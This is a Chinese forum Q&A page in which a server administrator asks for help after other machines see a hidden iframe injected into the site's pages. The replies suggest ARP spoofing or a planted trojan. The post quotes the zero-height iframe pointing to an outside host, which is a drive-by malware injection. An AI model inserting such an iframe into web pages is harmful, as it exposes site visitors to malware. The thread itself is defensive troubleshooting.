当前位置: 代码迷 >> 应用服务器 >> 服务器中大招了,请大家帮忙不知是ARP欺骗还是木马,该如何处理
  详细解决方案

服务器中大招了,请大家帮忙不知是ARP欺骗还是木马,该如何处理

热度:2286   发布时间:2013-02-26 00:00:00.0
服务器中大招了,请大家帮忙不知是ARP欺骗还是木马
症状:
一、在服务器上打域名访问网站正常
二、在其它机器上访问网站时网站头部自动加载
<iframe   src= 'http://mm916.com/101/index.htm '   height=0   width=80> </iframe>
三、从服务器上将网页拷贝下来检查,一切正常。
杀毒用nod32木马软件也用了无效,ARP帮定网卡也搞了还是无效,有经验的朋友点两招谢谢了。

------解决方案--------------------------------------------------------
可能是该服务器同一网段的其他服务器中了arp,找网管吧
------解决方案--------------------------------------------------------
你应该是被人挂了木马,你需要仔细找找有没有最近被装上的文件,最好是能找出那些最近装上的文件,然后利用那个挂马的工具进行清理,我以前服务器也有过一次这样的事情!

------解决方案--------------------------------------------------------
被人挂了码了,要把那段iframe src= 'http://mm916.com/101/index.htm ' height=0 width=80> </iframe 的代码删除
  相关解决方案